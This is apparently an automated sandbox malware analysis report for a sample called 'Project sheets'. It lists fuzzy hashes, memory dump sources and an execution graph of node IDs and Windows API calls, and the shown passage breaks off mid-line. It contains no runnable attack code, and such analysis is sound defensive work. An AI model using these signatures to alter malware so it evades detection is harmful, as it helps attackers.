                    • Opcode Fuzzy Hash: fb40d04a3b7abc64eba7269005aee192bb666ef5af38aff0b8093317ca48a42d
                    • Instruction Fuzzy Hash: 1271E574E192099FCB04CFA9C6819EEFBF2FB89310F24946AE505B7314D3359A418B65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bb7fbd0a79b1e69425c85ac707b33291c4368f99fa280413aed9280bdadb211d
                    • Instruction ID: e02b3e5f6dfd2c39d2d40b9050460eea4d291bdc5e9330d0c218703ae85dbcb2
                    • Opcode Fuzzy Hash: bb7fbd0a79b1e69425c85ac707b33291c4368f99fa280413aed9280bdadb211d
                    • Instruction Fuzzy Hash: E971E574E192099FCB08CFA9C6815EEFBF2FF89310F24946AE505B7314D3359A418B65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0d3a0b947a8fd7ca0c980594c01960022e98c080c475ef2221c781dc8e5631ba
                    • Instruction ID: cd9ca9e3198cc85a88c61ba71a8fbc21ea0dca4dcb31925556f6d6ebe231d382
                    • Opcode Fuzzy Hash: 0d3a0b947a8fd7ca0c980594c01960022e98c080c475ef2221c781dc8e5631ba
                    • Instruction Fuzzy Hash: 9F6138B4D05209CBDF14CFA9E9815EEFBB2FB85310F24942AD609B7354D7349A41CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 435b710da53408e1a68602f080c308d1de6b0e7b6b1719fb7309db0c21c645a1
                    • Instruction ID: 79b726c6945709d04187f5001bbd5c039050accf543ee8f35be10f0456edcaa9
                    • Opcode Fuzzy Hash: 435b710da53408e1a68602f080c308d1de6b0e7b6b1719fb7309db0c21c645a1
                    • Instruction Fuzzy Hash: 436149B5E0520ACBDF14CFA9E9415AFFBB2FF84310F24942AD609A7350D7349A41CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1cb4443f70b01059851e4dd498c6f356914d1a716207269915ba345273be7a2b
                    • Instruction ID: 48902be5c4f71ca32372ccfc3b4e08ce5a48047fe33f991a5d178da0371a6350
                    • Opcode Fuzzy Hash: 1cb4443f70b01059851e4dd498c6f356914d1a716207269915ba345273be7a2b
                    • Instruction Fuzzy Hash: 807102B4E0520ACFCB14CF99D5809AEFBB2FF88310F14855ADA05AB314D334A982CF94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c4dac2c68d81b50861e6fa3b5aef0855ef49fd4a9051e34678444db219a8be2a
                    • Instruction ID: cdfebbcdf72b833bdac6a0695a53ecd0343dc3561356610b810e76b698a40bbb
                    • Opcode Fuzzy Hash: c4dac2c68d81b50861e6fa3b5aef0855ef49fd4a9051e34678444db219a8be2a
                    • Instruction Fuzzy Hash: DE61F474E0520ACFCB14CFA9C5809AEFBB2FF89310F14856ADA15A7715D334A982CF94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5a88113b2ecfada85ca8f9ef46f5f29fd57da42331e7f238db855d66bc8a02b8
                    • Instruction ID: f8ae262ee176101318bdde3d33bfa66937b42cabacc17d20f9b7a4e911664df4
                    • Opcode Fuzzy Hash: 5a88113b2ecfada85ca8f9ef46f5f29fd57da42331e7f238db855d66bc8a02b8
                    • Instruction Fuzzy Hash: 5C5115B4E0520A9BCB44CFAAC5815AFFBF2EF88310F24D56AD505B7314E3319A41CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b0c1c02e872724f3eb71e5b78b80de498d57f8305bb587d553374432659ec465
                    • Instruction ID: 3b4186a35450fcf846f60eb675f71d46041a5840742fc13d619e9f5223b11f66
                    • Opcode Fuzzy Hash: b0c1c02e872724f3eb71e5b78b80de498d57f8305bb587d553374432659ec465
                    • Instruction Fuzzy Hash: E35103B4E0520A8BDB44CFAAC5815AFFBF2BF88310F24D46AD505B7318D3359A41CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d662d8116aaaac1d6956abcdc4891726ca699af7001e35c163e5b5664571e0e2
                    • Instruction ID: 689cfea0e8811d29cfd6d57bcb5e29f0501f2b45a802078172e264df110092a8
                    • Opcode Fuzzy Hash: d662d8116aaaac1d6956abcdc4891726ca699af7001e35c163e5b5664571e0e2
                    • Instruction Fuzzy Hash: E3319CB1E056589BDB58CF6BDD402CAF6F7AFC9310F14C1BA950CA6264EB3109428E40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:31.1%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:4.5%
                    Total number of Nodes:1842
                    Total number of Limit Nodes:92
                    execution_graph 9687 40c640 9712 404bee 9687->9712 9690 40c70f 9691 404bee 6 API calls 9692 40c66b 9691->9692 9693 40c708 9692->9693 9695 404bee 6 API calls 9692->9695 9694 402bab 2 API calls 9693->9694 9694->9690 9696 40c683 9695->9696 9697 40c701 9696->9697 9698 404bee 6 API calls 9696->9698 9699 402bab 2 API calls 9697->9699 9701 40c694 9698->9701 9699->9693 9700 402bab 2 API calls 9700->9697 9703 405872 4 API calls 9701->9703 9704 40c6f8 9701->9704 9711 40c6ef 9701->9711 9702 402bab 2 API calls 9702->9704 9705 40c6c5 9703->9705 9704->9700 9706 405872 4 API calls 9705->9706 9707 40c6d5 9706->9707 9708 405872 4 API calls 9707->9708 9709 40c6e7 9708->9709 9710 402bab 2 API calls 9709->9710 9710->9711 9711->9702 9713 402b7c 2 API calls 9712->9713 9714 404bff 9713->9714 9715 4031e5 4 API calls 9714->9715 9718 404c3b 9714->9718 9716 404c28 9715->9716 9717 402bab 2 API calls 9716->9717 9716->9718 9717->9718 9718->9690 9718->9691 9719 405941 9720 4031e5 4 API calls 9719->9720 9721 405954 9720->9721 8291 409046 8304 413b28 8291->8304 8293 40906d 8295 405b6f 6 API calls 8293->8295 8294 40904e 8294->8293 8296 403fbf 7 API calls 8294->8296 8297 40907c 8295->8297 8296->8293 8298 409092 8297->8298 8308 409408 8297->8308 8300 4090a3 8298->8300 8303 402bab 2 API calls 8298->8303 8302 402bab 2 API calls 8302->8298 8303->8300 8305 413b31 8304->8305 8306 413b38 8304->8306 8307 404056 6 API calls 8305->8307 8306->8294 8307->8306 8309 409413 8308->8309 8310 40908c 8309->8310 8322 409d36 8309->8322 8310->8302 8321 40945c 8428 40a35d 8321->8428 8323 409d43 8322->8323 8324 40a35d 4 API calls 8323->8324 8325 409d55 8324->8325 8326 4031e5 4 API calls 8325->8326 8327 409d8b 8326->8327 8328 4031e5 4 API calls 8327->8328 8329 409dd0 8328->8329 8330 405b6f 6 API calls 8329->8330 8362 409423 8329->8362 8333 409df7 8330->8333 8331 409e1c 8332 4031e5 4 API calls 8331->8332 8331->8362 8334 409e62 8332->8334 8333->8331 8335 402bab 2 API calls 8333->8335 8336 4031e5 4 API calls 8334->8336 8335->8331 8337 409e82 8336->8337 8338 4031e5 4 API calls 8337->8338 8339 409ea2 8338->8339 8340 4031e5 4 API calls 8339->8340 8341 409ec2 8340->8341 8342 4031e5 4 API calls 8341->8342 8343 409ee2 8342->8343 8344 4031e5 4 API calls 8343->8344 8345 409f02 8344->8345 8346 4031e5 4 API calls 8345->8346 8347 409f22 8346->8347 8348 4031e5 4 API calls 8347->8348 8351 409f42 8348->8351 8349 40a19b 8350 408b2c 4 API calls 8349->8350 8350->8362 8351->8349 8352 409fa3 8351->8352 8353 405b6f 6 API calls 8352->8353 8352->8362 8354 409fbd 8353->8354 8355 40a02c 8354->8355 8357 402bab 2 API calls 8354->8357 8356 40a16d 8355->8356 8358 4031e5 4 API calls 8355->8358 8359 402bab 2 API calls 8356->8359 8356->8362 8360 409fd7 8357->8360 8361 40a070 8358->8361 8359->8362 8363 405b6f 6 API calls 8360->8363 8364 4031e5 4 API calls 8361->8364 8362->8321 8384 4056bf 8362->8384 8366 409fe5 8363->8366 8365 40a090 8364->8365 8367 4031e5 4 API calls 8365->8367 8366->8355 8368 402bab 2 API calls 8366->8368 8369 40a0b0 8367->8369 8370 409fff 8368->8370 8373 4031e5 4 API calls 8369->8373 8371 405b6f 6 API calls 8370->8371 8372 40a00d 8371->8372 8372->8355 8375 40a021 8372->8375 8374 40a0d0 8373->8374 8377 4031e5 4 API calls 8374->8377 8376 402bab 2 API calls 8375->8376 8376->8362 8378 40a0f0 8377->8378 8379 4031e5 4 API calls 8378->8379 8380 40a110 8379->8380 8381 40a134 8380->8381 8382 4031e5 4 API calls 8380->8382 8381->8356 8438 408b2c 8381->8438 8382->8381 8385 402b7c 2 API calls 8384->8385 8386 4056cd 8385->8386 8387 4056d4 8386->8387 8388 402b7c 2 API calls 8386->8388 8389 408c4d 8387->8389 8388->8387 8390 413ba4 6 API calls 8389->8390 8391 408c5c 8390->8391 8392 408f02 8391->8392 8393 408f3a 8391->8393 8396 40903e 8391->8396 8395 405b6f 6 API calls 8392->8395 8394 405b6f 6 API calls 8393->8394 8410 408f51 8394->8410 8397 408f0c 8395->8397 8412 413aca 8396->8412 8397->8396 8401 408f31 8397->8401 8441 40a1b6 8397->8441 8399 405b6f 6 API calls 8399->8410 8400 402bab 2 API calls 8400->8396 8401->8400 8403 409031 8404 402bab 2 API calls 8403->8404 8404->8401 8405 409022 8406 402bab 2 API calls 8405->8406 8407 409028 8406->8407 8408 402bab 2 API calls 8407->8408 8408->8401 8409 402bab GetProcessHeap RtlFreeHeap 8409->8410 8410->8396 8410->8399 8410->8401 8410->8403 8410->8405 8410->8409 8411 40a1b6 14 API calls 8410->8411 8475 4044ee 8410->8475 8411->8410 8413 409451 8412->8413 8414 413ad7 8412->8414 8422 405695 8413->8422 8415 405781 4 API calls 8414->8415 8416 413af0 8415->8416 8417 405781 4 API calls 8416->8417 8418 413afe 8417->8418 8419 405762 4 API calls 8418->8419 8420 413b0e 8419->8420 8420->8413 8421 405781 4 API calls 8420->8421 8421->8413 8423 4056a0 8422->8423 8424 4056b9 8422->8424 8425 402bab 2 API calls 8423->8425 8424->8321 8426 4056b3 8425->8426 8427 402bab 2 API calls 8426->8427 8427->8424 8429 40a368 8428->8429 8430 40a39a 8428->8430 8436 4031e5 4 API calls 8429->8436 8431 40a3af 8430->8431 8432 4031e5 4 API calls 8430->8432 8433 40a3ca 8431->8433 8434 408b2c 4 API calls 8431->8434 8432->8431 8435 40a38a 8433->8435 8437 408b2c 4 API calls 8433->8437 8434->8433 8435->8310 8436->8435 8437->8435 8439 4031e5 4 API calls 8438->8439 8440 408b3e 8439->8440 8440->8356 8442 40a202 8441->8442 8443 40a1c3 8441->8443 8597 405f08 8442->8597 8445 405b6f 6 API calls 8443->8445 8447 40a1d0 8445->8447 8446 40a1fc 8446->8401 8447->8446 8448 40a1f3 8447->8448 8485 40a45b 8447->8485 8453 402bab 2 API calls 8448->8453 8450 40a333 8452 402bab 2 API calls 8450->8452 8452->8446 8453->8446 8454 405b6f 6 API calls 8456 40a245 8454->8456 8455 40a25d 8457 405b6f 6 API calls 8455->8457 8456->8455 8458 413a58 13 API calls 8456->8458 8463 40a26b 8457->8463 8459 40a257 8458->8459 8462 402bab 2 API calls 8459->8462 8460 40a28b 8461 405b6f 6 API calls 8460->8461 8468 40a297 8461->8468 8462->8455 8463->8460 8464 40a284 8463->8464 8604 40955b 8463->8604 8466 402bab 2 API calls 8464->8466 8466->8460 8467 405b6f 6 API calls 8472 40a2b7 8467->8472 8469 40a2b0 8468->8469 8468->8472 8611 40968e 8468->8611 8471 402bab 2 API calls 8469->8471 8471->8472 8472->8450 8472->8467 8474 402bab 2 API calls 8472->8474 8621 4098a7 8472->8621 8474->8472 8476 402b7c 2 API calls 8475->8476 8477 404512 8476->8477 8479 404585 GetLastError 8477->8479 8480 402bab 2 API calls 8477->8480 8483 402b7c 2 API calls 8477->8483 8484 40457c 8477->8484 8876 4044a7 8477->8876 8481 404592 8479->8481 8479->8484 8480->8477 8482 402bab 2 API calls 8481->8482 8482->8484 8483->8477 8484->8410 8630 40642c 8485->8630 8487 40a469 8488 40c4ff 8487->8488 8633 4047e6 8487->8633 8488->8448 8491 4040bb 12 API calls 8492 40bf88 8491->8492 8492->8488 8493 403c90 8 API calls 8492->8493 8494 40bfaa 8493->8494 8495 402b7c 2 API calls 8494->8495 8497 40bfc1 8495->8497 8496 40c4f3 8498 403f9e 5 API calls 8496->8498 8499 40c3aa 8497->8499 8640 40a423 8497->8640 8498->8488 8499->8496 8502 4056bf 2 API calls 8499->8502 8505 40c4e3 8499->8505 8500 402bab 2 API calls 8500->8496 8504 40c3d2 8502->8504 8504->8505 8507 4040bb 12 API calls 8504->8507 8505->8500 8506 405f08 4 API calls 8508 40c005 8506->8508 8509 40c3f3 8507->8509 8510 40c021 8508->8510 8643 40a43f 8508->8643 8512 40c4d1 8509->8512 8700 405a52 8509->8700 8511 4031e5 4 API calls 8510->8511 8514 40c034 8511->8514 8517 413aca 4 API calls 8512->8517 8523 4031e5 4 API calls 8514->8523 8518 40c4dd 8517->8518 8521 405695 2 API calls 8518->8521 8519 40c411 8705 405a87 8519->8705 8520 402bab 2 API calls 8520->8510 8521->8505 8529 40c04d 8523->8529 8524 40c4b3 8525 402bab 2 API calls 8524->8525 8527 40c4cb 8525->8527 8526 405a52 4 API calls 8537 40c423 8526->8537 8528 403f9e 5 API calls 8527->8528 8528->8512 8531 4031e5 4 API calls 8529->8531 8530 405a87 4 API calls 8530->8537 8532 40c085 8531->8532 8534 4031e5 4 API calls 8532->8534 8533 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 8533->8537 8535 40c09c 8534->8535 8538 4031e5 4 API calls 8535->8538 8536 402bab 2 API calls 8536->8537 8537->8524 8537->8526 8537->8530 8537->8533 8537->8536 8539 40c0b3 8538->8539 8540 4031e5 4 API calls 8539->8540 8541 40c0ca 8540->8541 8542 4031e5 4 API calls 8541->8542 8543 40c0e7 8542->8543 8544 4031e5 4 API calls 8543->8544 8545 40c100 8544->8545 8546 4031e5 4 API calls 8545->8546 8547 40c119 8546->8547 8548 4031e5 4 API calls 8547->8548 8549 40c132 8548->8549 8550 4031e5 4 API calls 8549->8550 8551 40c14b 8550->8551 8552 4031e5 4 API calls 8551->8552 8553 40c164 8552->8553 8554 4031e5 4 API calls 8553->8554 8555 40c17d 8554->8555 8556 4031e5 4 API calls 8555->8556 8557 40c196 8556->8557 8558 4031e5 4 API calls 8557->8558 8559 40c1af 8558->8559 8560 4031e5 4 API calls 8559->8560 8561 40c1c8 8560->8561 8562 4031e5 4 API calls 8561->8562 8563 40c1de 8562->8563 8564 4031e5 4 API calls 8563->8564 8565 40c1f4 8564->8565 8566 4031e5 4 API calls 8565->8566 8567 40c20d 8566->8567 8568 4031e5 4 API calls 8567->8568 8569 40c226 8568->8569 8570 4031e5 4 API calls 8569->8570 8571 40c23f 8570->8571 8572 4031e5 4 API calls 8571->8572 8573 40c258 8572->8573 8574 4031e5 4 API calls 8573->8574 8575 40c273 8574->8575 8576 4031e5 4 API calls 8575->8576 8577 40c28a 8576->8577 8578 4031e5 4 API calls 8577->8578 8581 40c2d5 8578->8581 8579 40c3a2 8580 402bab 2 API calls 8579->8580 8580->8499 8581->8579 8582 4031e5 4 API calls 8581->8582 8583 40c315 8582->8583 8584 40c38b 8583->8584 8646 404866 8583->8646 8585 403c40 5 API calls 8584->8585 8587 40c397 8585->8587 8589 403c40 5 API calls 8587->8589 8589->8579 8590 40c382 8592 403c40 5 API calls 8590->8592 8592->8584 8594 406c4c 6 API calls 8595 40c355 8594->8595 8595->8590 8670 4126a7 8595->8670 8598 4031e5 4 API calls 8597->8598 8599 405f1d 8598->8599 8600 405f55 8599->8600 8601 402b7c 2 API calls 8599->8601 8600->8446 8600->8450 8600->8454 8600->8455 8602 405f36 8601->8602 8602->8600 8603 4031e5 4 API calls 8602->8603 8603->8600 8605 409673 8604->8605 8610 40956d 8604->8610 8605->8464 8606 408b45 6 API calls 8606->8610 8607 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8607->8610 8608 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 8608->8610 8609 402bab GetProcessHeap RtlFreeHeap 8609->8610 8610->8605 8610->8606 8610->8607 8610->8608 8610->8609 8612 4040bb 12 API calls 8611->8612 8619 4096a9 8612->8619 8613 40989f 8613->8469 8614 409896 8615 403f9e 5 API calls 8614->8615 8615->8613 8617 408b45 6 API calls 8617->8619 8618 402bab GetProcessHeap RtlFreeHeap 8618->8619 8619->8613 8619->8614 8619->8617 8619->8618 8620 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 8619->8620 8869 4059d8 8619->8869 8620->8619 8622 4040bb 12 API calls 8621->8622 8629 4098c1 8622->8629 8623 4099fb 8623->8472 8624 4099f3 8625 403f9e 5 API calls 8624->8625 8625->8623 8626 402bab GetProcessHeap RtlFreeHeap 8626->8629 8627 4059d8 4 API calls 8627->8629 8628 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 8628->8629 8629->8623 8629->8624 8629->8626 8629->8627 8629->8628 8631 4031e5 4 API calls 8630->8631 8632 406441 GetNativeSystemInfo 8631->8632 8632->8487 8634 4031e5 4 API calls 8633->8634 8637 40480a 8634->8637 8635 40485d 8635->8488 8635->8491 8636 4031e5 4 API calls 8636->8637 8637->8635 8637->8636 8638 40484f 8637->8638 8639 403c40 5 API calls 8638->8639 8639->8635 8641 4031e5 4 API calls 8640->8641 8642 40a435 8641->8642 8642->8506 8644 4031e5 4 API calls 8643->8644 8645 40a451 8644->8645 8645->8520 8647 4031e5 4 API calls 8646->8647 8648 40487c 8647->8648 8648->8590 8649 406c4c 8648->8649 8710 4068eb 8649->8710 8651 406e02 8651->8594 8652 406cab 8722 40469b 8652->8722 8653 406c6c 8653->8651 8653->8652 8719 406894 8653->8719 8660 406df1 8661 40469b 4 API calls 8660->8661 8661->8651 8662 406cef 8662->8660 8663 4031e5 4 API calls 8662->8663 8664 406d26 8663->8664 8664->8660 8665 40771e 6 API calls 8664->8665 8669 406d57 8665->8669 8666 406da2 8667 4031e5 4 API calls 8666->8667 8667->8660 8669->8666 8735 4068b0 8669->8735 8671 4126bb 8670->8671 8672 4126d1 8670->8672 8673 412840 8671->8673 8791 40488c 8671->8791 8672->8673 8797 407055 8672->8797 8673->8590 8678 403c40 5 API calls 8678->8673 8680 41281e 8681 4070ff 6 API calls 8680->8681 8682 412837 8681->8682 8682->8678 8683 407055 6 API calls 8684 412742 8683->8684 8684->8680 8685 40719a 6 API calls 8684->8685 8686 41276e 8685->8686 8687 412804 8686->8687 8813 406f4a 8686->8813 8841 4070ff 8687->8841 8690 41279a 8819 412553 8690->8819 8863 405907 8700->8863 8702 405a76 8702->8519 8703 405907 4 API calls 8704 405a61 8703->8704 8704->8702 8704->8703 8706 402b7c 2 API calls 8705->8706 8708 405a99 8706->8708 8709 405ade 8708->8709 8866 40595e 8708->8866 8709->8537 8738 4076a8 8710->8738 8712 406913 8713 406a61 8712->8713 8714 40771e 6 API calls 8712->8714 8713->8653 8715 406949 8714->8715 8715->8713 8716 40771e 6 API calls 8715->8716 8717 404678 4 API calls 8715->8717 8744 4046c2 8715->8744 8716->8715 8717->8715 8720 4031e5 4 API calls 8719->8720 8721 4068a6 8720->8721 8721->8653 8723 4046b4 8722->8723 8724 4046a4 8722->8724 8723->8651 8726 404678 8723->8726 8725 4031e5 4 API calls 8724->8725 8725->8723 8727 4031e5 4 API calls 8726->8727 8728 40468b 8727->8728 8728->8651 8729 40771e 8728->8729 8730 407737 8729->8730 8734 407748 8729->8734 8731 407644 6 API calls 8730->8731 8732 407741 8731->8732 8733 406baa 6 API calls 8732->8733 8733->8734 8734->8662 8736 4031e5 4 API calls 8735->8736 8737 4068c2 8736->8737 8737->8669 8739 4076c1 8738->8739 8743 4076d2 8738->8743 8752 407644 8739->8752 8743->8712 8745 4046d3 8744->8745 8746 4046d9 8744->8746 8787 40464c 8745->8787 8748 4046e9 8746->8748 8750 404678 4 API calls 8746->8750 8749 404714 8748->8749 8751 40469b 4 API calls 8748->8751 8749->8715 8750->8748 8751->8749 8753 407653 8752->8753 8754 407661 8752->8754 8753->8754 8760 406a6b 8753->8760 8756 406baa 8754->8756 8757 406bbb 8756->8757 8759 406bc8 8756->8759 8757->8759 8768 407402 8757->8768 8759->8743 8761 406a81 8760->8761 8762 402b7c 2 API calls 8761->8762 8763 406894 4 API calls 8761->8763 8764 406b96 8761->8764 8765 402bab 2 API calls 8761->8765 8767 406b8b 8761->8767 8762->8761 8763->8761 8766 402bab 2 API calls 8764->8766 8765->8761 8766->8767 8767->8754 8769 407644 6 API calls 8768->8769 8770 407412 8769->8770 8771 402b7c 2 API calls 8770->8771 8778 407450 8770->8778 8772 407483 8771->8772 8773 402b7c 2 API calls 8772->8773 8772->8778 8775 4074ce 8773->8775 8774 4074da 8776 4068cc 2 API calls 8774->8776 8775->8774 8777 402b7c 2 API calls 8775->8777 8776->8778 8781 40751f 8777->8781 8778->8759 8779 40752b 8780 4068cc 2 API calls 8779->8780 8780->8774 8781->8779 8783 4068cc 8781->8783 8784 4068d6 8783->8784 8785 4068e3 8783->8785 8784->8785 8786 402bab GetProcessHeap RtlFreeHeap 8784->8786 8785->8779 8786->8785 8788 404666 8787->8788 8789 404659 8787->8789 8788->8746 8790 4031e5 4 API calls 8789->8790 8790->8788 8792 4047e6 5 API calls 8791->8792 8793 404897 8792->8793 8794 40489c 8793->8794 8849 4047c7 8793->8849 8794->8672 8798 40706f 8797->8798 8799 407084 8797->8799 8798->8799 8800 407644 6 API calls 8798->8800 8804 4070e4 8799->8804 8852 406fd2 8799->8852 8801 40707d 8800->8801 8803 406baa 6 API calls 8801->8803 8803->8799 8804->8682 8805 40719a 8804->8805 8806 4071b0 8805->8806 8810 4071c5 8805->8810 8807 407644 6 API calls 8806->8807 8806->8810 8808 4071be 8807->8808 8809 406baa 6 API calls 8808->8809 8809->8810 8811 406fd2 4 API calls 8810->8811 8812 407226 8810->8812 8811->8812 8812->8680 8812->8683 8814 406f64 8813->8814 8818 406f75 8813->8818 8815 407644 6 API calls 8814->8815 8816 406f6e 8815->8816 8817 406baa 6 API calls 8816->8817 8817->8818 8818->8690 8860 4060ac 8819->8860 8842 407116 8841->8842 8843 40712b 8841->8843 8842->8843 8844 407644 6 API calls 8842->8844 8846 406fd2 4 API calls 8843->8846 8848 407187 8843->8848 8845 407124 8844->8845 8847 406baa 6 API calls 8845->8847 8846->8848 8847->8843 8848->8680 8850 4031e5 4 API calls 8849->8850 8851 4047d9 8850->8851 8851->8672 8853 406fde 8852->8853 8854 4031e5 4 API calls 8853->8854 8859 407027 8853->8859 8855 406ffa 8854->8855 8856 4031e5 4 API calls 8855->8856 8857 407011 8856->8857 8858 4031e5 4 API calls 8857->8858 8858->8859 8859->8804 8861 4031e5 4 API calls 8860->8861 8862 4060bb 8861->8862 8862->8862 8864 4031e5 4 API calls 8863->8864 8865 40591a 8864->8865 8865->8704 8867 4031e5 4 API calls 8866->8867 8868 405971 8867->8868 8868->8708 8870 4031e5 4 API calls 8869->8870 8871 4059ed 8870->8871 8872 402b7c 2 API calls 8871->8872 8875 405a38 8871->8875 8873 405a16 8872->8873 8874 4031e5 4 API calls 8873->8874 8873->8875 8874->8875 8875->8619 8877 4031e5 4 API calls 8876->8877 8878 4044b9 8877->8878 8878->8477 9793 40a349 9794 4098a7 13 API calls 9793->9794 9795 40a359 9794->9795 9037 408952 9058 40823f 9037->9058 9040 408960 9042 4056bf 2 API calls 9040->9042 9043 40896a 9042->9043 9086 408862 9043->9086 9045 413aca 4 API calls 9046 4089d4 9045->9046 9048 405695 2 API calls 9046->9048 9047 408975 9055 4089c4 9047->9055 9094 4087d6 9047->9094 9050 4089df 9048->9050 9055->9045 9056 402bab 2 API calls 9057 40899d 9056->9057 9057->9055 9057->9056 9059 40824d 9058->9059 9060 4031e5 4 API calls 9059->9060 9073 40831b 9059->9073 9061 40826d 9060->9061 9062 4031e5 4 API calls 9061->9062 9063 408289 9062->9063 9064 4031e5 4 API calls 9063->9064 9065 4082a5 9064->9065 9066 4031e5 4 API calls 9065->9066 9067 4082c1 9066->9067 9068 4031e5 4 API calls 9067->9068 9069 4082e2 9068->9069 9070 4031e5 4 API calls 9069->9070 9071 4082ff 9070->9071 9072 4031e5 4 API calls 9071->9072 9072->9073 9073->9040 9074 4083bb 9073->9074 9122 408363 9074->9122 9077 4084ab 9077->9040 9078 4056bf 2 API calls 9083 4083f4 9078->9083 9079 408492 9080 413aca 4 API calls 9079->9080 9081 4084a0 9080->9081 9082 405695 2 API calls 9081->9082 9082->9077 9083->9079 9125 40815d 9083->9125 9140 40805d 9083->9140 9155 404b8f 9086->9155 9088 408946 9088->9047 9089 40887e 9089->9088 9090 4031e5 4 API calls 9089->9090 9091 40893e 9089->9091 9093 402b7c 2 API calls 9089->9093 9090->9089 9158 404a39 9091->9158 9093->9089 9095 402b7c 2 API calls 9094->9095 9096 4087e7 9095->9096 9097 40885a 9096->9097 9098 4031e5 4 API calls 9096->9098 9106 408749 9097->9106 9100 408802 9098->9100 9099 402bab 2 API calls 9099->9097 9102 40884d 9100->9102 9105 408853 9100->9105 9167 408522 9100->9167 9171 4084b4 9100->9171 9174 4084d4 9102->9174 9105->9099 9107 404b8f 5 API calls 9106->9107 9111 408765 9107->9111 9108 4031e5 4 API calls 9108->9111 9109 408522 4 API calls 9109->9111 9110 4087c7 9112 404a39 5 API calls 9110->9112 9111->9108 9111->9109 9111->9110 9113 4087cf 9111->9113 9112->9113 9114 4085d1 9113->9114 9115 4086c2 9114->9115 9118 4085e9 9114->9118 9115->9057 9117 402bab 2 API calls 9117->9118 9118->9115 9118->9117 9119 4031e5 4 API calls 9118->9119 9180 4089e6 9118->9180 9199 4086c9 9118->9199 9203 4036a3 9118->9203 9119->9118 9123 4031e5 4 API calls 9122->9123 9124 408386 9123->9124 9124->9077 9124->9078 9126 40816f 9125->9126 9127 4081b6 9126->9127 9128 4081fd 9126->9128 9139 4081ef 9126->9139 9130 405872 4 API calls 9127->9130 9129 405872 4 API calls 9128->9129 9131 408213 9129->9131 9132 4081cf 9130->9132 9133 405872 4 API calls 9131->9133 9134 405872 4 API calls 9132->9134 9136 408222 9133->9136 9135 4081df 9134->9135 9137 405872 4 API calls 9135->9137 9138 405872 4 API calls 9136->9138 9137->9139 9138->9139 9139->9083 9141 40808c 9140->9141 9142 4080d2 9141->9142 9143 408119 9141->9143 9154 40810b 9141->9154 9145 405872 4 API calls 9142->9145 9144 405872 4 API calls 9143->9144 9146 40812f 9144->9146 9147 4080eb 9145->9147 9149 405872 4 API calls 9146->9149 9148 405872 4 API calls 9147->9148 9150 4080fb 9148->9150 9151 40813e 9149->9151 9152 405872 4 API calls 9150->9152 9153 405872 4 API calls 9151->9153 9152->9154 9153->9154 9154->9083 9161 404a19 9155->9161 9157 404ba0 9157->9089 9164 4049ff 9158->9164 9160 404a44 9160->9088 9162 4031e5 4 API calls 9161->9162 9163 404a2c RegOpenKeyW 9162->9163 9163->9157 9165 4031e5 4 API calls 9164->9165 9166 404a12 RegCloseKey 9165->9166 9166->9160 9169 408534 9167->9169 9168 4085af 9168->9100 9169->9168 9177 4084ee 9169->9177 9172 